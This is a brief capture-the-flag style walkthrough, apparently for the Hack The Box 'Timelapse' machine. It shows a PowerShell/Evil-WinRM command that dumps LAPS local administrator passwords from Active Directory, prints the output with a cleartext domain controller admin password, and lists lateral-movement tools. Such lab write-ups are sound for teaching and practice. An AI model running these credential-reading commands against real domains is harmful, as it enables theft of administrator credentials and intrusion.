LAPS Password Read

We execute the following command in Powershell if we want to read LAPS Passwords.

Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime

Notice in the output how the password is contained within ms-Mcs-AdmPwd.

Evil-WinRM* PS C:\Users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime}


PSComputerName              : localhost
RunspaceId                  : ae9923c4-551b-480e-aebd-e19931fe811a
DistinguishedName           : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName                 : dc01.timelapse.htb
Enabled                     : True
ms-Mcs-AdmPwd               : 8p4Uc,AC5lJ9E]P9X7#3$10@
ms-Mcs-AdmPwdExpirationTime : 132951514281823553
Name                        : DC01
ObjectClass                 : computer
ObjectGUID                  : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName              : DC01$
SID                         : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName           :

Now we try the whole deal:

• psexec

• evilwinrm

• psremoting

• runas

• cme